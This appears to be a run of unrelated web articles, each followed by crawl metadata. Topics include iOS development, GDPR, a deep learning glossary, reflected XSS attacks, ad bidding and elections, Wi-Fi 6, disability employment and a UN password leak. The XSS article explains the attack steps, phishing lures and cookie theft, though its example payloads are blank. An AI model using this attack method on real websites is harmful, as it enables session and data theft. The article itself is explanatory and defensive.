the heavy lifting to the cloud. By connecting your app to cloud-based services through APIs, you can use the cloud for storage, database management, and even app caching. You can also augment your app with innovative next-generation services. IBM Cloud® supports server-side Swift frameworks, including Kitura, for building iOS back ends as well as web applications. You can invoke REST APIs from within the iOS app. Using Kitura, you can integrate with a range of IBM Cloud services, from push notifications and databases to mobile analytics and machine learning. (For more on building iOS back ends, see this short IBM tutorial about creating an app with Kitura.) Test locally, test globally Even the best developers don’t write perfect code — at least not the first time around. Once you’ve completed your iOS app development, you’ll need to test it. Fortunately, you will not need to test mobile devices from multiple manufacturers, as you might when developing for Android. iOS is Apple’s proprietary mobile operating system, which runs only on Apple iPhones. Although you might want to test your iOS app on several generations of iPhones (with multiple operating systems), there are still fewer devices to test than with Android. Your first line of testing is in Xcode itself. In addition to the standard unit tests you’re used to, Xcode features automated UI testing. You can write tests that navigate through your UI, interacting with your app like a user would to locate any issues. The UI testing doesn’t use APIs to interact with your code—it simulates a real user’s interaction with your app. As long as you write tests that cover every aspect of your app, you can automatically get UI testing that’s often more thorough than what any human can accomplish. However, unless your tests account for every possible interaction a user could have with your app, you’ll still want to let humans beta test your software. While you can sideload apps to iOS devices without submitting them to the App Store, Apple makes it easy for friends, family or your user base to preview your app with its TestFlight app. TestFlight allows Apple Developer Program members to do internal testing with up to 25 team members on up to 30 devices each. You can give your iOS app development team a chance to test your app in a small group and prepare for the Apple Beta review so that you can release your new iOS app to external testers. Once Apple approves your app under its App Store review guidelines, you can invite up to 10,000 users to download a test version. These users download the TestFlight app and use a unique link to access your app. You can divide your external testers into custom groups and push specific builds to each group, allowing you to perform A/B tests and compare responses to features. In return, you automatically get data on usage and users can easily submit feedback about any issues they encounter. Publish your app to the App Store Once you’re done with iOS app development and testing, you’ll need to submit your app to the App Store. You can submit and sign your app directly through Xcode. Be patient: The app review process can be lengthy, frequently requiring multiple iterations of rejection-revision-resubmission-rejection until you get your final approval. Once you’ve passed all approvals, you can build your App Store page by using a program called App Store Connect and push your app to the App Store. If you’re planning on selling your app, remember that Apple takes a 30 percent cut of your sales, in addition to the $99 annual fee they charge to participate in the Developer Program. Are you ready to try your hand at iOS app development? Want to see your iOS app in use on iPhones, iPads and other Apple devices the world over? IBM offers an easy-to-follow, hands-on tutorial for building an iOS app with cloud-based push notifications and performance monitoring. Learn about the features and capabilities of the IBM Mobile Foundation, in addition to IBM Push Notifications through the Introduction to Mobile Foundation course contained within the IBM Cloud Professional Developer curriculum.
<urn:uuid:0ebfadad-4895-48a5-ae15-05ae326e21f1>
CC-MAIN-2022-40
https://www.ibm.com/cloud/learn/ios-app-development-explained
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00420.warc.gz
en
0.924596
1,800
2.8125
3
The new General Data Protection Regulation (GDPR) is not all about ensuring that your business or organisation has consent to process personal data; there is far more to it than that. Information governance is a major consideration, as covered by Article 32 of the regulation. Does this mean that all personal data has to be encrypted? Many businesses and organisations choose to encrypt all of the personal data that they deal with. However, GDPR does not actually stipulate that this is necessary in order for businesses and organisations to be compliant. It simply states that data needs to be kept and processes securely, in a manner that is appropriate to the level of risk that is present. Why is the measurement of risk important? Businesses and organisations that process high levels of sensitive personal data, or whose data processing may involve a level of risk, need to assess risks and potential impacts. Data Protection Impact Assessments (DPIAs) should be used for this purpose. Once high risk data processing activities have been identified they need to be mitigated against. Processes and procedures that are put in place need to be fully documented, in order for the business or organisation to meet compliance requirements. If there is no apparent mitigation available in a high risk situation the business or organisation should not process the data until it has consulted with the appropriate Data Processing Authority (DPA). Reporting data breaches Businesses and organisations also need to have plans in place for the reporting of data breaches when they occur. Any breaches need to be reported to the DPA within 72 hours of the business or organisation first becoming aware of the breach. Planning of this type is an important consideration when it comes to dealing with the information governance aspect of GDPR compliance.
<urn:uuid:4f5d4c0f-525b-48c8-bbe7-2fdea44c237f>
CC-MAIN-2022-40
https://www.compliancejunction.com/information-governance-gdpr/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00620.warc.gz
en
0.947514
348
2.640625
3
Ready to learn Artificial Intelligence? Browse courses like Uncertain Knowledge and Reasoning in Artificial Intelligence developed by industry thought leaders and Experfy in Harvard Innovation Lab. Ever struggle to recall what Adam, ReLU or YOLO mean? Look no further and check out every term you need to master Deep Learning. Surviving in the Deep Learning world means understanding and navigating through the jungle of technical terms. You’re not sure what AdaGrad, Dropout, or Xavier Initialization mean? Use this guide as a reference to freshen up your memory when you stumble upon a term that you safely parked in a dusty corner in the back of your mind. This dictionary aims to briefly explain the most important terms of Deep Learning. It contains short explanations of the terms, accompanied by links to follow-up posts, images, and original papers. The post aims to be equally useful for Deep Learning beginners and practitioners. Let’s open the encyclopedia of deep learning. Activation Function— Used to create a non-linear transformation of the input. The inputs are multiplied by weights and added to a bias term. Popular Activation functions include ReLU, tanh or sigmoid. Adam Optimization — Can be used instead of stochastic gradient descent optimization methods to iteratively adjust network weights. Adam is computationally efficient, works well with large data sets, and requires little hyperparameter tuning, according to the inventors. Adam uses an adaptive learning rate α, instead of a predefined and fixed learning rate. Adam is currently the default optimization algorithm in deep learning models. Adaptive Gradient Algorithm — AdaGrad is a gradient descent optimization algorithm that features an adjustable learning rate for every parameter. AdaGrad adjusts the parameters on frequently updated parameters in smaller steps than for less frequently updated parameters. It thus fares well on very sparse data sets, e.g. for adapting word embeddings in Natural Language Processing tasks. Read the paper here. Average Pooling — Averages the results of a convolutional operation. It is often used to shrink the size of an input. Average pooling was primarily used in older Convolutional Neural Networks architectures, while recent architectures favor maximum pooling. AlexNet — A popular CNN architecture with eight layers. It is a more extensive network architecture than LeNet and takes longer to train. AlexNet won the 2012 ImageNet image classification challenge. Read the paper here. Backpropagation —The general framework used to adjust network weights to minimize the loss function of a neural network. The algorithm travels backward through the network and adjusts the weights through a form of gradient descent of each activation function. Backpropagation travels back through the network and adjusts the weights Batch Gradient Descent — Regular gradient descent optimization algorithm. Performs parameter updates for the entire training set. The algorithm needs to calculate the gradients of the whole training set before completing a step of parameter updates. Thus, batch gradient can be very slow for large training sets. Batch Normalization — Normalizes the values in a neural network layer to values between 0 and 1. This helps train the neural network faster. Bias —Occurs when the model does not achieve a high accuracy on the training set. It is also called underfitting. When a model has a high bias, it will generally not yield high accuracy on the test set. Classification — When the target variable belongs to a distinct class, not a continuous variable. Image classification, fraud detection or natural language processing are examples of deep learning classification tasks. Convolution — A mathematical operation which multiplies an input with a filter. Convolutions are the foundation of Convolutional Neural Networks, which excel at identifying edges and objects in images. Cost Function — Defines the difference between the calculated output and what it should be. Cost functions are one of the key ingredients of learning in deep neural networks, as they form the basis for parameter updates. The network compares the outcome of its forward propagation with the ground-truth and adjusts the network weights accordingly to minimize the cost function. The root mean squared error is a simple example of a cost function. Deep Neural Network — A neural network with many hidden layers, usually more than five. It is not defined how many layers minimum a deep neural network has to have. Deep Neural Networks are a powerful form of machine learning algorithms which are used to determine credit risk, steer self-driving cars and detect new planets in the universe. Derivative of a function. Source: https://goo.gl/HqKdeg Derivative — The derivative is the slope of a function at a specific point. Derivatives are calculated to let the gradient descent algorithm adjust weight parameters towards the local minimum. Dropout — A regularization technique which randomly eliminates nodes and its connections in deep neural networks. Dropout reduces overfitting and enables faster training of deep neural networks. Each parameter update cycle, different nodes are dropped during training. This forces neighboring nodes to avoid relying on each other too much and figuring out the correct representation themselves. It also improves the performance of certain classification tasks. Read the paper here. End-to-End Learning — An algorithm is able to solve the entire task by itself. Additional human intervention, like model switching or new data labeling, is not necessary. For example, end-to-end driving means that the neural network figures out how to adjust the steering command just by evaluating images. Epoch —Encompasses a single forward and backward pass through the training set for every example. A single epoch touches every training example in an iteration. Forward Propagation — A forward pass in deep neural networks. The input travels through the activation functions of the hidden layers until it produces a result at the end. Forward propagation is also used to predict the result of an input example after the weights have been properly trained. Fully-Connected layer — A fully-connected layer transforms an input with its weights and passes the result to the following layer. This layer has access to all inputs or activations from the previous layer. Gated Recurrent Unit —A Gated Recurrent Unit (GRU) conducts multiple transformations on the given input. It is mostly used in Natural Language Processing Tasks. GRUs prevent the vanishing gradients problem in RNNs, similar to LSTMs. In contrast to LSTMs, GRUs don’t use a memory unit and are thus more computationally efficient while achieving a similar performance. Read the paper here. No forget gate, in contrast to LSTM. Source: https://goo.gl/dUPtdV Human-Level Performance — The best possible performance of a group of human experts. Algorithms can exceed human-level performance. Valuable metric to compare and improve neural network against. Hyperparameters — Determine performance of your neural network. Examples of hyperparameters are, e.g. learning rate, iterations of gradient descent, number of hidden layers, or the activation function. Not to be confused with parameters or weights, which the DNN learns itself. ImageNet — Collection of thousands of images and their annotated classes. Very useful resource for image classification tasks. Iteration — Total number of forward and backward passes of a neural network. Every batch counts as one pass. If your training set has 5 batches and trains 2 epochs, then it will run 10 iterations. Gradient Descent — Helps Neural Network decide how to adjust parameters to minimize the cost function. Repeatedly adjust parameters until the global minimum is found. This post contains a well-explained, holistic overview of different gradient descent optimization methods. Layer — A set of activation functions which transform the input. Neural networks use multiple hidden layers to create output. You generally distinguish between the input, hidden, and output layers. Learning Rate Decay — A concept to adjust the learning rate during training. Allows for flexible learning rate adjustments. In deep learning, the learning rate typically decays the longer the network is trained. Maximum Pooling — Only selects the maximum values of a specific input area. It is often used in convolutional neural networks to reduce the size of the input. Long Short-Term Memory — A special form of RNN which is able to learn the context of an input. While regular RNNs suffer from vanishing gradients when corresponding inputs are located far away from each other, LSTMs can learn these long-term dependencies. Read the paper here. Input and Output of an LSTM unit. Source: https://bit.ly/2GlKyMF Mini-Batch Gradient Descent— An optimization algorithm which runs gradient descent on smaller subsets of the training data. The method enables parallelization as different workers separately iterate through different mini-batches. For every mini-batch, compute the cost and update the weights of the mini-batch. It’s an efficient combination of batch and stochastic gradient descent. Momentum — A gradient descent optimization algorithm to smooth the oscillations of stochastic gradient descent methods. Momentum calculates the average direction of the direction of the previously taken steps and adjusts the parameter update in this direction. Imagine a ball rolling downhill and using this momentum when adjusting to roll left or right. The ball rolling downhill is an analogy to gradient descent finding the local minimum. Neural Network — A machine learning model which transforms inputs. A vanilla neural network has an input, hidden, and output layer. Neural Networks have become the tool of choice for finding complex patterns in data. Non-Max Suppression — Algorithm used as a part of YOLO. It helps detect the correct bounding box of an object by eliminating overlapping bounding boxes with a lower confidence of identifying the object. Read the paper here. Recurrent Neural Networks — RNNs allow the neural network to understand the context in speech, text or music. The RNN allows information to loop through the network, thus persisting important features of the input between earlier and later layers. ReLU— A Rectified Linear Unit, is a simple linear transformation unit where the output is zero if the input is less than zero and the output is equal to the input otherwise. ReLU is the activation function of choice because it allows neural networks to train faster and it prevents information loss. Regression —Form of statistical learning where the output variable is a continuous instead of a categorical value. While classification assigns a class to the input variable, regression assigns a value that has an infinite number of possible values, typically a number. Examples are the prediction of house prices or customer age. Root Mean Squared Propagation — RMSProp is an extension of the stochastic gradient descent optimization method. The algorithm features a learning rate for every parameter, but not a learning rate for the entire training set. RMSProp adjusts the learning rate based on how quickly the parameters changed in previous iterations. Read the paper here. Parameters — Weights of a DNN which transform the input before applying the activation function. Each layer has its own set of parameters. The parameters are adjusted through backpropagation to minimize the loss function. Weights of a neural network Softmax — An extension of the logistic regression function which calculates the probability of the input belonging to every one of the existing classes. Softmax is often used in the final layer of a DNN. The class with the highest probability is chosen as the predicted class. It is well-suited for classification tasks with more than two output classes. Stochastic Gradient Descent — An optimization algorithm which performs a parameter update for every single training example. The algorithm converges usually much faster than batch gradient descent, which performs a parameter update after calculating the gradients for the entire training set. Supervised Learning — Form of Deep Learning where an output label exists for every input example. The labels are used to compare the output of a DNN to the ground-truth values and minimize the cost function. Other forms of Deep Learning tasks are semi-supervised training and unsupervised training. Transfer Learning — A technique to use the parameters from one neural network for a different task without retraining the entire network. Use weights from a previously trained network and remove output layer. Replace the last layer with your own softmax or logistic layer and train network again. Works because lower layers often detect similar things like edges which are useful for other image classification tasks. Unsupervised Learning — A form of machine learning where the output class is not known. GANs or Variational Auto Encoders are used in unsupervised Deep Learning tasks. Validation Set — The validation set is used to find the optimal hyperparameters of a deep neural network. Generally, the DNN is trained with different combinations of hyperparameters are tested on the validation set. The best performing set of hyperparameters is then applied to make the final prediction on the test set. Pay attention to balancing the validation set. If lots of data is available, use as much as 99% for the training, 0.5% for the validation and 0.5% the test set. Vanishing Gradients — The problem arises when training very deep neural networks. In backpropagation, weights are adjusted based on their gradient, or derivative. In deep neural networks, the gradients of the earlier layers can become so vanishingly small, that the weights are not updated at all. The ReLU activation function is suited to address this problem because it doesn’t squash the input as much as other functions. Read the paper here. Variance —Occurs when the DNN overfits to the training data. The DNN fails to distinguish noise from pattern and models every variance in the training data. A model with high variance usually fails to accurately generalize to new data. Vector — A combination of values that are passed as inputs into an activation layer of a DNN. VGG-16 — A popular network architecture for CNNs. It simplifies the architecture of AlexNet and has a total of 16 layers. There are many pretrained VGG models which can be applied to novel use cases through transfer learning. Read the paper here. Xavier Initialization — Xavier initialization assigns the start weights in the first hidden layer so that the input signals reach deep into the neural network. It scales the weights based on the number of neurons and outputs. This way, it prevents the signal from either becoming too small or too large later in the network. YOLO — You Only Look Once, is an algorithm to identify objects in an image. Convolutions are used to determine the probability of an object being in a part of an image. Non-max suppression and anchor boxes are then used to correctly locate the objects. Read the paper here. I hope this dictionary helped you get a clearer understanding of the terms used in the deep learning world. Keep this guide handy when taking the Coursera Deep Learning Specialization to quickly look up terms and concepts.
<urn:uuid:a23cc711-cf7a-4844-9e0f-e83ac631c639>
CC-MAIN-2022-40
https://resources.experfy.com/ai-ml/the-deep-learning-dictionary/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00620.warc.gz
en
0.878581
3,220
3.046875
3
Non-Persistent cross-site scripting or non-persistent XSS, also known as Reflected XSS, is one of the three major categories of XSS attacks, the others are; persistent (or Stored) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s browser trust in a legitimate, but vulnerable website or web application (the general XSS premises). The reflected XSS condition is met when a website or web application employs user input in HTML pages returned to the user’s browser, without validating the input first. With Non-Persistent cross-site scripting, malicious code is executed by the victim’s browser, and the payload is not stored anywhere; instead, it is returned as part of the response HTML that the server sends. Therefore, the victim is being tricked into sending malicious code to the vulnerable web application, which is then reflected back to the victim’s browser where the XSS payload executes. Non-Persistent XSS is the most commonly carried out XSS attack, as the vulnerabilities which make it possible are more common than those which enable other types of XSS. Non-Persistent XSS is also called Type 1 XSS because the attack is carried out through a single request / response cycle. Typical Steps in a Non-Persistent XSS Attacka) Research At this stage, the attacker searches vulnerable websites that can be used to carry out the attack. A visual verification is conducted in order to determine if user input is used in the response HTML page as in the following examples: - Websites having search functionality and displaying the searched term on the HTML page returned with the results - Websites with log on functionality, displaying the logged on user name on the returned HTML page - Websites displaying information encoded in the HTTP headers, such as browser type and version - Websites making use of DOM parameter values, such as Once a website is identified as being potentially vulnerable, the attackers try to inject script code into the relevant areas and verify if the script is returned in its original form (and executed). This process can either be manual or automatic, depending on the website /web application and the potential injection points found. Examples of Malicious Code Delivery 1) Potential injection point: URL - Malicious example: 2) Potential injection point: DOM - Malicious example: b) Social engineering Using social engineering, the attacker will influence the user into clicking on a crafted link that contains the malicious URL which injects code into vulnerable web pages / web applications, using one or more of the following techniques: - SPAM email containing a crafted link - SPAM email containing HTML code - Malicious web pages containing a malicious URL - Social media: messages / posts containing a malicious link - XSS techniques: using Persistent (Stored) XSS, malicious links can be saved as part of forum posts / comments and reflected back to visiting users - Other types of attacks: DNS rebinding – compromises the hosts file causing your browser to get redirected to malicious pages instead of the intended web page, compromising the wireless router, etc. c) Payload execution/consequences Once the victim has clicked on the malicious link, and if the attack is successful, the payload will get executed in the victim’s context and call home to the attacker in order to communicate the results, as well as upload stolen data, etc. The consequences vary, because the attack enables execution of arbitrary code, usually with elevated privileges – most home users still use the default “administrator” account and although latest Windows operating systems come with user access control and hardened browser policies, they are usually disabled in order to improve on the user experience. Usual targets of attacks are: - Cookie theft – attackers can read authentication cookies that are still active, and can be used to perform further attacks. - Data theft – attackers can read browser history, directory listings, file contents, helping prepare for next attacks or using information in other malicious ways. Defending Against Non-Persistent XSS The best way to prevent cross-site scripting is to make sure that the web application does not make use of user input in the return HTML pages, without validating it first. Validation implies verification of the user input to determine if the input is valid, according to its purpose. In case the validation functions find script tags, either in plain text or encoded, they should sanitize the input before it is passed on to the response HTML and make sure that the script is rendered harmless. The strength of the sanitization depends on the ability of the validation functions to identify scripts in the user input. With the increased dynamics in web page content, as well as web 2.0, keeping the web application XSS-free also involves regular assessment tests carried out using web vulnerability scanners that are able to perform penetration testing against the web application, identify XSS vulnerabilities and provide the necessary information on how to fix them. Users should always be weary of what they click on; avoid playing seemingly harmless games, claiming random prizes or opening emails that don’t come from a trusted source. At the same time, users should avoid installing browser plugins which do not have a good reputation and those which are not really a necessity (such as toolbars), since these may make their browser vulnerable too. Using secure and up-to-date web browsers will also help users keep away from “victim” status. Vulnerable websites are just the medium – the real target is you. Get the latest content on web security in your inbox each week.
<urn:uuid:5f9fcfbc-aa45-4b83-805d-74059525472b>
CC-MAIN-2022-40
https://www.acunetix.com/blog/articles/non-persistent-xss/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00620.warc.gz
en
0.880804
1,329
3.421875
3
Update (April 2019) It was brought to my attention that Brennan center has used some of the research described in the article to fill an amicus curiae (legal opinion to the appeal court) in a case touching election protection from disinformation operations and political advertisement transparency. The rest of the article is left unchanged. Did you encounter a web, Facebook or Twitter advertisement seemingly tailored to your interests or related with your recent actions on the web? Chances are this was delivered to you via Real-Time Bidding channels. I am involved in technical research and analysis of Real-Time Bidding systems and their potential influence on modern societies. However, there are also interesting policy aspects. The goal of this short note is to touch one of possible influences on democratic systems. For a simple description of Real-Time Bidding systems (RTB), please refer to one of my works. To simplify, there are three parties involved in the system: - The user, who enters a web site, launches a mobile app or other marvel of technology capable of displaying online ads - A web site or mobile app which includes web ads scripts - A script provider, who is operating Real-Time Bidding system, the Ad Exchange - A number (tens, hundreds) of bidders, who bid for the user's attention After detecting that a user has entered a web site (mobile app, etc.), the Ad Exchange holds an auction: it sends some data about the user to the auctions bidders. Bidders evaluate the obtained data and they decide if they want to display a message, typically an advertisement - to the user. They submit their bids, and all this happens fast (tens of milliseconds). At the end the user can see the message. Creative uses of RTB On a side note, Real-Time Bidding systems are not always used just to send web ads. Relatively recently, they are also very effective in serving malicious code (malware) to end-users. Sadly, a wide range of examples highlight the problem. In general, it is widely known that even simple and perhaps innocuous differences of presenting information can potentially have influence on voters decisions. Tying this to the fact that users might have problems with distinguishing content from ads, brings to an interesting question. What happens if users find it difficult to distinguish (e.g.) news material and actual ads? What if this happens during electoral campaign? Real-Time Bidding provides very fine-graned targeting capabilities. Aside from receiving information on the user from the Ad Exchange (during auction phase), bidders are known to have their own databases, possibly obtained from Data Brokers. It is possible to target based on gender, education level, occupation, income, type of interests, location, and so on. It is also possible to target based on political inclinations. "I think it's pretty safe to say that had a substantial impact on the election (...) you’re looking at swaying the votes of the very prized few who matter the most", says a representative of one of the advertising companies. Informing the public about the aims or goals of a political party or advocate group using just another channel (next to TV, news papers or so) might not seem to be surprising. However, since there are no clear transparency messages embedded in the Real-Time Bidding messages, the users potentially have no way of understanding who is actually targeting the content to them. Imagine a situation when external players from a country X's agency will suddenly start targeting users in a particular country Y, prior to or during the election campaign? Such campaigns could be executed cost-efficiently. And what about a situation of an agency of a country X who would register as a bidder of an Ad Exchange system? The technical ability of influencing a democratic process by external players cannot be ruled out. As more and more ads is being served using targeting, via means such as RTB, this is a debate hard to avoid. Real-Time Bidding provides rich capabilities of serving content to users. While there are security, privacy and transparency questions, the infrastructure and technical capabilities pose interesting issues. It is interesting to see if - or when - we will encounter the use of Real-Time bidding in disinformation or information warfare.
<urn:uuid:1ee1cd46-ca14-48a5-b3cf-9554f1524b75>
CC-MAIN-2022-40
https://blog.lukaszolejnik.com/soft-influence-on-societies/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00620.warc.gz
en
0.948058
891
2.53125
3
The Institute of Electrical and Electronic Engineers (IEEE) is the organization responsible for the standards that define modern wireless enterprise networks, for example, WLANs. Industry interests are coordinated through the Wi-Fi Alliance. They select the subset of features that become the minimum set of features for certified hardware, software, and devices. They also control the use of trademarks. The IEEE uses a unique numbering sequence for every standard. The 802 standard is for networking but is further broken down into 22 subparts. 802.11 is the sub-part for wireless networking. Over the past 20 years, the 802.11 standard has been updated many times beginning with revision 802.11a and continuing through 802.11ax. Some of the updates addressed specific technical shortcomings (for example, QoS) of the original standard, while others substantially changed fundamentals of the wireless protocol (for example, QAM modulation). In retrospect, the fundamental changes were generational changes. It is simply the IEEE and Wi-Fi Alliance acknowledging the benefit of explicitly identifying the major generational changes within the 802.11 specification family. See the table below. |Wi-Fi 3||802.11a, g| The technical changes equip Wi-Fi 6 to handle very high user device density per access point (AP) and the demands of 4K and 8K streaming video or multiuser virtual/augmented reality (VR/AR). There are four significant changes. The first three changes are only applicable to 802.11ax APs communicating with 802.11ax user devices. The first change is an increase from 4 x 4 MIMO to 8 x 8 MIMO that can direct the eight data streams to a single user (achieving higher peak speed) or simultaneously assign one data stream to each of eight users, for example, multi-user MIMO (achieving lower average latency). The second is an increase in the RF signal modulation from 256 quadrature amplitude modulation (QAM) to 1024 QAM for 25 percent higher peak speeds for users in close proximity to the AP. The third change adds scheduling to the OFDM (becoming OFDMA) to provide deterministic use of the time-frequency resources when all devices are participating in MU-MIMO. The fourth change uses the increased number of antennas required to support 8 x 8 MIMO to provide more directional beamforming and allows more effective noise suppression (maximum ratio combining [MRC]), providing benefit to all users, including legacy users. 802.11ax still uses the original Carrier Sense Multiple Access (CSMA) technique using Clear Channel Assessment (CCA). CCA/CSMA is contention based, not deterministic, and is the root cause of most Wi-Fi latency and jitter issues. When all devices are 802.11ax, the CCA thresholds can be adjusted for higher average AP capacity – with the trade-off of potentially lower peak speeds. Enterprise WLANs should be upgraded on a six- or seven-year cycle to avoid network equipment end of life (EOL) or end of support (EOS). If you have a validated use case involving high user density and streaming video, then Wi-Fi 6 is the obvious choice. If your usage scenarios are more typical enterprise applications, then upgrade with current mainstream equipment – Wi-Fi 5 or Wi-Fi 6. If you would like to receive our quarterly newsletter, View from the Edge, you can sign up here.
<urn:uuid:f80ace3e-5f47-4fca-8d0d-5be2ad99474e>
CC-MAIN-2022-40
https://www.blackbox.com/en-gb/insights/blogs/detail/bbns/2019/12/04/wi-fi-6-what-is-it
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00620.warc.gz
en
0.886699
776
3.078125
3
This October is the 75th year America has observed National Disability Employment Awareness Month (NDEAM). Like other “awareness months,” NDEAM spotlights a disparity in the workforce—in this case, the lower than average employment rates of Persons with Disabilities (PWDs). NDEAM works to lessen this inequity through workshops, seminars, and online resources. This year also marks the 30th anniversary of the Americans With Disabilities Act (ADA). The United States has made significant progress, thanks to the tireless work of activists and advocates for the disabled community, but unfortunately, we will need to continue to call attention to NDEAM and the ADA until a truly equitable workforce is finally achieved. An inequitable workforce According to the Centers for Disease Control and Prevention (CDC), PWDs make up approximately 26% of the adult population in the United States (this is approximately the same percentage of all non-White minorities combined). This number includes D/deaf and blind Americans, wheelchair users, neurodiverse persons, and people with age-related disabilities. One out of every four adults in this country, or 61 million people, have some sort of disability and yet this vast, diverse community continues to be denied basic workplace equality and accessibility (and it is expected that the number of PWDs is set to double in the next twenty years). The U.S. unemployment rate among PWDs is roughly twice as high as the national unemployment rate, and the numbers are even higher amongst people with certain types of disabilities. Gallaudet University reports that people with “severe hearing problems” have an unemployment rate of 41% to as high as 52%. If we are striving for an equitable society where the workforce accurately and fairly reflects the entire adult population, we have a long way to go and need to continue to raise awareness. This year’s NDEAM theme is “Increasing Access and Opportunity.” I am intimately familiar with the challenges to access because I have been profoundly deaf since birth. Growing up in the late 1980s and 1990s, access was almost always an uphill battle. As a child, my parents and I had to fight for access and inclusive opportunities; for example, captioning. I did not always have access to captioned live events or feel comfortable asking for a seat closer to the speaker so I could lip-read. Luckily, I have witnessed a shift and for the most part, I can now request such services and my needs will be met without being made to feel like an inconvenience (though certainly not always). In my UX Design career today, I strive to create designs that are as inclusive as possible because it’s personal. As an IBMer on the Accessibility team, I help create tools that make accessibility easy for teams to learn and apply. My role within Accessibility at IBM is not just a job; it’s a passion and a calling. Inclusive Design is about equalizing experiences and products for those who have different needs or barriers (disabilities). The term “disability” should not refer to people being “defective,” but rather how they must operate in an environment that doesn’t cater, or has barriers, to their needs. For example, if a place only has stairs, a wheelchair user encounters a barrier, but a ramp or elevator erases that barrier. Until access requests disappear because they are consistently acknowledged, anticipated, and made readily available, our community will need to continue to raise awareness. Why hire PWDs? Diversity on teams and in leadership positions provide companies with fresh perspectives and an authentic understanding of their clients’ needs. This lends to new ideas and innovation, which allow companies to maintain a competitive edge. The benefits of a diverse, more inclusive workforce are becoming more and more apparent and widely accepted. For example, in her book, Make Room For Her, Rebecca Shambaugh points to research that shows companies with women on their boards perform better: their profits are greater; they are more likely to attract and retain top talent; and they are better able to grow and maintain a competitive edge. The same positive benefits would certainly result from hiring more PWDs; whether they have visible or invisible disabilities, these are valuable perspectives that can contribute to a more inclusive and equitable workforce, not to mention a more diverse customer/client base. When you hire people with different backgrounds, you are more likely to design and create products and services that cater to a wider, more diverse range of the consumer population. IBM is deeply proud of its long and storied history in hiring and, perhaps more importantly, recognizing the value that PWDs bring to the workforce. Internally we use the term “Persons with Diverse Abilities” (PWDAs) to highlight the fact that diversity brings in different perspectives, which is hugely beneficial for innovation—the heart of what we do at IBM! IBM also recognizes that it would be financially irresponsible to create products that deny access to more than a quarter of the population. By hiring PWDAs, IBM ensures its products reflect all possible customers. Who best to design for, communicate with, and sell to these potential consumers than PWDAs? Access leads to opportunities, which generate more innovative and creative tools, products, and services. National Disability Employment Awareness Month is a crucial observance of the importance and benefits of incorporating accessibility, and implementing Inclusive Design, into workplaces and corporations at all levels of management and operation. I am grateful for the raised awareness during the month of October, but relish the thought of a future in which NDEAM is no longer needed. For those familiar with generating or receiving compliance reports on the accessibility of technology products, the VPAT, or Voluntary Product Accessibility Template is a familiar term. The VPAT form was created by the Information Technology Industry (ITI) Council for companies to report how well their technology products and services meet widely adopted accessibility standards. The […] Positivity changes hearts and minds and culture. We still have a long way to go. But as we celebrate the 31st anniversary of the American with Disabilities Act, I wanted to step back and celebrate how far we’ve come. IBM remembers Dr. Brent Shiver. His perspective as a Deaf person was an essential part of his impact: "Because of my deafness, I see the world differently from my colleagues and can make technical and innovative contributions from angles not usually considered."
<urn:uuid:19d693c0-d54c-4f88-b425-f5dcaa2c3513>
CC-MAIN-2022-40
https://www.ibm.com/blogs/age-and-ability/2020/10/26/ndeam/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00620.warc.gz
en
0.958836
1,330
2.59375
3
A couple weeks ago, we covered the West Australian government’s security audit here on the Octopus Blog. The section of the governmental audit’s research into cyber security practices unveiled some pretty disturbing facts. Given the opportunity, users will choose the most obvious, easiest to guess passwords, leaving them wide-open targets for cyber criminals. While the size and scope of this phenomenon was received with shock, no infosec professional worth his or her salt could really be surprised. Password based authentication fosters bad security practices. This is a long established fact. The truth is, the data collected in Australia’s recent audit doesn’t stand alone. Other recent findings have exposed another serious security issue passwords inevitably create. The Vulnerabilities Pile Up Passwords aren’t only problematic when they themselves are weak. Passwords are essentially cryptographic secrets. These secrets need to be managed and stored. Even for individual users with multiple online accounts, this can be a difficult task. For a large organization with hundreds if not thousands of members, it becomes a major logistical hurdle. And here’s where many organizations relying on passwords to protect identities end up failing. This fact was made public most recently late last month, when security researcher Kushagra Pathank discovered openly accessible links to internal documents belonging to the United Nations. According to reports, UN employees made this breach possible by misconstruing files on popular project management service Trello, the tracking app Jira, and Google Docs. The mistake allowed anyone with the proper link to access these documents, rather than being accessible to specific users only. Pathank came across these documents by running simple search engine queries. The searches produced public Trello pages, some of which contained links to the public Google Docs and Jira pages. The data revealed in these documents contained passwords for various UN accounts, including the video conferencing system at the UN’s language school, a web development environment for the UN’s Office for the Coordination of Humanitarian Affairs, and access to UN websites currently under development. “In total, Pathank discovered some 50 boards and documents that he was able to access–all because of the flawed security settings implemented during their setup.” There are two important points to highlight from this story.v First off is the shockingly low security standards of whoever was handling IT at the UN. One would expect that the largest, most influential diplomatic organization in the world would put in some more effort to secure documents containing so many credentials. To protect its passwords, the UN should have been using a password vault that utilizes a privileged access management approach. At the very least there should have been a second authentication factor in place to access these files. But there is a another, more important element that needs to be pointed out, and that’s the fact that the UN is using passwords at all. Its because the UN is utilizing passwords that they had to resort to a form of managing them. And of course, whoever was in charge of that, chose an easier, less secure option. Pathank–who has become quite an expert at identifying publicly accessible private files–explained that exposure of these types of files happens simply because leaving them unsecured is easier than securing them. Users opt for “sharing the URL of the board without [actually adding users] to the board” since securely adding members with access “seems to be huge task for these people” Pathank said. This whole episode serves as another stark lesson on how password-based authentication leads to security problems. The good news is that the digital sphere no longer has to rely on passwords or deal with all of the vulnerabilities they create. Password-less, out-of-band authentication is the way of the future. With these tools, companies and private users alike can circumvent all the pitfalls of passwords, and achieve network-wide authentication that is both seamless, and more secure.
<urn:uuid:8a13b516-208b-4134-833e-571b1fbc5794>
CC-MAIN-2022-40
https://doubleoctopus.com/blog/general/the-un-unexpected-example-of-poor-password-management/
null
